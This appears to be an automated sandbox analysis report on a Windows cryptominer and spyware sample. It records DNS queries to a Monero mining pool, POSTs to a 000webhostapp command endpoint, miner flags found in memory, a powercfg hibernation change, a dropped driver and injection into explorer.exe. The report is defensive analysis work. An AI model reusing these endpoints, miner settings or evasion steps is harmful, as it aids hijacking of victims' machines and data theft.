Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: global traffic	DNS traffic detected: DNS query: pachydermal-deviati.000webhostapp.com

Source: unknown

HTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 484Content-Type: application/jsonHost: pachydermal-deviati.000webhostapp.comUser-Agent: cpp-httplib/0.12.6

Source: explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crlf
Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 00000005.00000002.4197962632.000001F4E8E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198579161.000001F4E9070000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198022550.000001F4E8E2C000.00000004.00000020.00020000.00000000.sdmp, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E904D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php--cinit-version=3.4.0--nicehash--tls--
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.
Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.exee
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.phpD
Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.phprdurxnlmtixfcpxr

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Desktop\gq83mrprwy.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Code function: 0_2_00007FF7970C1394 NtDeviceIoControlFile,	0_2_00007FF7970C1394
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Code function: 28_2_00007FF74F581394 NtWriteVirtualMemory,	28_2_00007FF74F581394
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_0000000140001394 NtQueryAttributesFile,	40_2_0000000140001394

Source: C:\Users\user\Desktop\gq83mrprwy.exe

Code function: 0_2_00007FF7970C1394: NtDeviceIoControlFile,

0_2_00007FF7970C1394

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

File created: C:\Windows\TEMP\zadejssjsckf.sys

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_arojeqlb.yfq.ps1

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Code function: 0_2_00007FF7970C3B50	0_2_00007FF7970C3B50
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Code function: 28_2_00007FF74F583B50	28_2_00007FF74F583B50
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_0000000140003150	40_2_0000000140003150
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000001400026E0	40_2_00000001400026E0

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\zadejssjsckf.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Code function: String function: 00007FF74F581394 appears 33 times
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Code function: String function: 00007FF7970C1394 appears 33 times

Source: classification engine

Classification label: mal100.spyw.evad.mine.winEXE@74/18@9/9

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8524:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj0bgugp.vym.ps1

Jump to behavior

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: gq83mrprwy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
